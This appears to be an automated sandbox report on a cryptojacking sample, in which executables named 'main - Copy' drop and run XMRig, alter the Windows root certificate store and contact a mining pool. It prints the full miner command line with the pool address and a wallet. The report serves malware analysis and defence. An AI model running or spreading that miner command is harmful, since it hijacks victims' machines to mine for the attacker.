memory/536-23-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-26-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-27-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-28-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-29-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-30-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-31-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-32-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-33-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-34-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-35-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-36-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-37-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-38-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-39-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-40-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-41-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-42-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-43-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-44-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-45-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-46-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-47-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-48-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-49-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-50-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-51-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-52-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-53-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-54-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-55-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-56-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-57-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-58-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-59-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-60-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-61-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-62-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-63-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-64-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-65-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-66-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-67-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-68-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-69-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-70-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-71-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-72-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-73-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-74-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-75-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-76-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-77-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-78-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-79-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-80-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-81-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-82-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-83-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-84-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 868 wrote to memory of 1136 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 868 wrote to memory of 1136 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.99:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 99.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| NL | 23.62.61.99:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1136-16-0x000002BF78110000-0x000002BF78130000-memory.dmp
memory/1136-17-0x000002BF78160000-0x000002BF78180000-memory.dmp
memory/1136-18-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-19-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-20-0x000002BF78410000-0x000002BF78430000-memory.dmp
memory/1136-21-0x000002BF78430000-0x000002BF78450000-memory.dmp
memory/1136-22-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-24-0x000002BF78410000-0x000002BF78430000-memory.dmp
memory/1136-23-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-25-0x000002BF78430000-0x000002BF78450000-memory.dmp
memory/1136-26-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-27-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-28-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-29-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-30-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-31-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-32-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-33-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-34-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-35-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-36-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-37-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-38-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-39-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-40-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-41-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-42-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-43-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-44-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-45-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-46-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-47-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-48-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-49-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-50-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-51-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-52-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-53-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-54-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-55-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-56-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-57-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-58-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-59-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-60-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-61-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-62-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-63-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-64-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-65-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-66-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-67-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-68-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-69-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-70-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-71-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-72-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-73-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-74-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-75-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-76-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-77-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-78-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-79-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-80-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-81-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-82-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-83-0x00007FF606040000-0x00007FF606B43000-memory.dmp
memory/1136-84-0x00007FF606040000-0x00007FF606B43000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240226-en
Max time kernel
1796s
Max time network
1810s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
